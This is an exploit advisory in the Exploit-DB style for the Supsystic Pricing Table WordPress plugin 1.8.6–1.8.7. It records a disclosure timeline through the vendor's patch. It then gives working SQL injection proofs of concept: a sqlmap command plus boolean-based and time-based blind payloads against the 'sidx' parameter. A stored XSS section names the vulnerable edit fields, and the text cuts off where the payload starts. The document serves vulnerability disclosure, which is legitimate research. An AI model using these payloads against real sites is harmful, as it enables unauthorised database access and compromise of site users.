# Exploit Title: WordPress Plugin Supsystic Pricing Table 1.8.7 - Multiple Vulnerabilities
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/pricing-table-by-supsystic.1.8.7.zip
# Version: 1.8.7 and 1.8.6
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2 # 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 07/12 2020: Vulnerability patched ##################################
SQLi
################################## # 1. Description The GET parameter "sidx" does not sanitize user input when searching for existing pricing tables. # 2. Proof of Concept (PoC) Use ZAP/Burp to capture the web request when searching for existing pricing tables and save it to request.txt
Referer: http://192.168.0.49/wp-admin/admin.php?page=supsystic-tables&module=tables sqlmap -r request.txt --dbms=mysql -p sidx Parameter: sidx (GET)
Type: boolean-based blind
Payload: mod=tables&action=getListForTbl&pl=pts&reqType=ajax&pts_nonce=2893fe633b&search[text_like]=test&_search=false&nd=1595624411398&rows=10&page=0&sidx=(SELECT (CASE WHEN (5313=5313) THEN 0x6964 ELSE (SELECT 9338 UNION SELECT 5490) END))&sord=desc Type: time-based blind
Payload: mod=tables&action=getListForTbl&pl=pts&reqType=ajax&pts_nonce=2893fe633b&search[text_like]=test&_search=false&nd=1595624411398&rows=10&page=0&sidx=id AND (SELECT 9475 FROM (SELECT(SLEEP(5)))OjhB)&sord=desc ##################################
Stored XSS
################################## # 1. Description The "Edit name" and "Edit HTML" features are vulnerable to stored XXS.
Location: http://192.168.0.49/wp-admin/admin.php?page=tables-supsystic&tab=tables_edit&id=[TABLE ID] # 2. Proof of Concept (PoC) Enter the following payload into the "Edit" field in the top left corner: ">
